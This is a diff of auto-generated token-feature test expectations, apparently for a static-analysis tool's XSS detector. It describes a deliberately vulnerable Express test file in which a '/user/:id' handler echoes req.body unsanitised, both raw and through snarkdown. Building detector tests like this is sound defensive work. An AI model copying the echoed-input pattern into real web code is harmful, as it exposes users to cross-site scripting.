+| autogenerated/Xss/ReflectedXss/ReflectedXss.js:79:8:79:16 | snarkdown | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:79:8:79:16 | snarkdown | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:79:8:79:16 | snarkdown | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:79:8:79:16 | snarkdown | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:79:8:79:16 | snarkdown | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:79:23:79:33 | 'snarkdown' | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:79:23:79:33 | 'snarkdown' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:79:23:79:33 | 'snarkdown' | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:80:5:80:14 | snarkdown2 | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:80:5:80:14 | snarkdown2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:80:5:80:14 | snarkdown2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:80:5:80:14 | snarkdown2 | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:80:5:80:37 | snarkdo ... kdown") | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:80:5:80:37 | snarkdo ... kdown") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:80:5:80:37 | snarkdo ... kdown") | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:80:5:80:37 | snarkdown2 | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:80:5:80:37 | snarkdown2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:80:5:80:37 | snarkdown2 | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:80:18:80:24 | require | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:80:18:80:24 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:80:18:80:24 | require | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:80:18:80:37 | exceptional return of require("snarkdown") | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:80:18:80:37 | exceptional return of require("snarkdown") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:80:18:80:37 | exceptional return of require("snarkdown") | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:80:18:80:37 | require("snarkdown") | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:80:18:80:37 | require("snarkdown") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:80:18:80:37 | require("snarkdown") | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:80:26:80:36 | "snarkdown" | CalleeFlexibleAccessPath | require | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:80:26:80:36 | "snarkdown" | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:80:26:80:36 | "snarkdown" | calleeImports | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:80:26:80:36 | "snarkdown" | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:80:26:80:36 | "snarkdown" | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:80:26:80:36 | "snarkdown" | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:1:82:3 | app | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:1:82:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:1:82:3 | app | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:1:82:7 | app.get | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:1:82:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:1:82:7 | app.get | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:1:86:2 | app.get ... T OK\\n}) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:1:86:2 | app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:1:86:2 | app.get ... T OK\\n}) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:1:86:2 | exceptional return of app.get ... T OK\\n}) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:1:86:2 | exceptional return of app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:1:86:2 | exceptional return of app.get ... T OK\\n}) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:5:82:7 | get | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:5:82:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:5:82:7 | get | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:9:82:19 | '/user/:id' | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:9:82:19 | '/user/:id' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:9:82:19 | '/user/:id' | calleeImports | express | @@ -20005,6 +134119,31 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:9:82:19 | '/user/:id' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:9:82:19 | '/user/:id' | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:9:82:19 | '/user/:id' | receiverName | app | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:22:82:21 | snarkdown | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:22:82:21 | snarkdown | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:22:82:21 | snarkdown | enclosingFunctionBody | req res res send req body res send snarkdown req body res send snarkdown2 req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:22:82:21 | snarkdown | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:22:82:21 | snarkdown | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:22:82:21 | snarkdown2 | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:22:82:21 | snarkdown2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:22:82:21 | snarkdown2 | enclosingFunctionBody | req res res send req body res send snarkdown req body res send snarkdown2 req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:22:82:21 | snarkdown2 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:22:82:21 | snarkdown2 | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:22:82:21 | this | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:22:82:21 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:22:82:21 | this | enclosingFunctionBody | req res res send req body res send snarkdown req body res send snarkdown2 req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:22:82:21 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:22:82:21 | this | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:22:86:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:22:86:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:22:86:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res res send req body res send snarkdown req body res send snarkdown2 req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:22:86:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:22:86:1 | 'arguments' object of anonymous function | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:22:86:1 | exceptional return of anonymous function | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:22:86:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:22:86:1 | exceptional return of anonymous function | enclosingFunctionBody | req res res send req body res send snarkdown req body res send snarkdown2 req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:22:86:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:22:86:1 | exceptional return of anonymous function | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:22:86:1 | functio ... OT OK\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:22:86:1 | functio ... OT OK\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:22:86:1 | functio ... OT OK\\n} | calleeImports | express | @@ -20012,6 +134151,61 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:22:86:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:22:86:1 | functio ... OT OK\\n} | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:22:86:1 | functio ... OT OK\\n} | receiverName | app | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:22:86:1 | return of anonymous function | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:22:86:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:22:86:1 | return of anonymous function | enclosingFunctionBody | req res res send req body res send snarkdown req body res send snarkdown2 req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:22:86:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:22:86:1 | return of anonymous function | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:32:82:34 | req | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:32:82:34 | req | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:32:82:34 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:32:82:34 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:32:82:34 | req | enclosingFunctionBody | req res res send req body res send snarkdown req body res send snarkdown2 req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:32:82:34 | req | enclosingFunctionBody | req res res send req body res send snarkdown req body res send snarkdown2 req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:32:82:34 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:32:82:34 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:32:82:34 | req | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:32:82:34 | req | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:37:82:39 | res | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:37:82:39 | res | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:37:82:39 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:37:82:39 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:37:82:39 | res | enclosingFunctionBody | req res res send req body res send snarkdown req body res send snarkdown2 req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:37:82:39 | res | enclosingFunctionBody | req res res send req body res send snarkdown req body res send snarkdown2 req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:37:82:39 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:37:82:39 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:37:82:39 | res | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:82:37:82:39 | res | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:83:3:83:5 | res | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:83:3:83:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:83:3:83:5 | res | enclosingFunctionBody | req res res send req body res send snarkdown req body res send snarkdown2 req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:83:3:83:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:83:3:83:5 | res | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:83:3:83:10 | res.send | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:83:3:83:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:83:3:83:10 | res.send | enclosingFunctionBody | req res res send req body res send snarkdown req body res send snarkdown2 req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:83:3:83:10 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:83:3:83:10 | res.send | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:83:3:83:20 | exceptional return of res.send(req.body) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:83:3:83:20 | exceptional return of res.send(req.body) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:83:3:83:20 | exceptional return of res.send(req.body) | enclosingFunctionBody | req res res send req body res send snarkdown req body res send snarkdown2 req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:83:3:83:20 | exceptional return of res.send(req.body) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:83:3:83:20 | exceptional return of res.send(req.body) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:83:3:83:20 | res.send(req.body) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:83:3:83:20 | res.send(req.body) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:83:3:83:20 | res.send(req.body) | enclosingFunctionBody | req res res send req body res send snarkdown req body res send snarkdown2 req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:83:3:83:20 | res.send(req.body) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:83:3:83:20 | res.send(req.body) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:83:7:83:10 | send | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:83:7:83:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:83:7:83:10 | send | enclosingFunctionBody | req res res send req body res send snarkdown req body res send snarkdown2 req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:83:7:83:10 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:83:7:83:10 | send | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:83:12:83:14 | req | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:83:12:83:14 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:83:12:83:14 | req | enclosingFunctionBody | req res res send req body res send snarkdown req body res send snarkdown2 req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:83:12:83:14 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:83:12:83:14 | req | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:83:12:83:19 | req.body | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:83:12:83:19 | req.body | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:83:12:83:19 | req.body | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | @@ -20020,6 +134214,46 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:83:12:83:19 | req.body | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:83:12:83:19 | req.body | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:83:12:83:19 | req.body | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:83:16:83:19 | body | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:83:16:83:19 | body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:83:16:83:19 | body | enclosingFunctionBody | req res res send req body res send snarkdown req body res send snarkdown2 req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:83:16:83:19 | body | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:83:16:83:19 | body | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:3:84:5 | res | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:3:84:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:3:84:5 | res | enclosingFunctionBody | req res res send req body res send snarkdown req body res send snarkdown2 req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:3:84:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:3:84:5 | res | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:3:84:10 | res.send | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:3:84:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:3:84:10 | res.send | enclosingFunctionBody | req res res send req body res send snarkdown req body res send snarkdown2 req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:3:84:10 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:3:84:10 | res.send | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:3:84:31 | exceptional return of res.sen ... .body)) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:3:84:31 | exceptional return of res.sen ... .body)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:3:84:31 | exceptional return of res.sen ... .body)) | enclosingFunctionBody | req res res send req body res send snarkdown req body res send snarkdown2 req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:3:84:31 | exceptional return of res.sen ... .body)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:3:84:31 | exceptional return of res.sen ... .body)) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:3:84:31 | res.sen ... .body)) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:3:84:31 | res.sen ... .body)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:3:84:31 | res.sen ... .body)) | enclosingFunctionBody | req res res send req body res send snarkdown req body res send snarkdown2 req body | +| 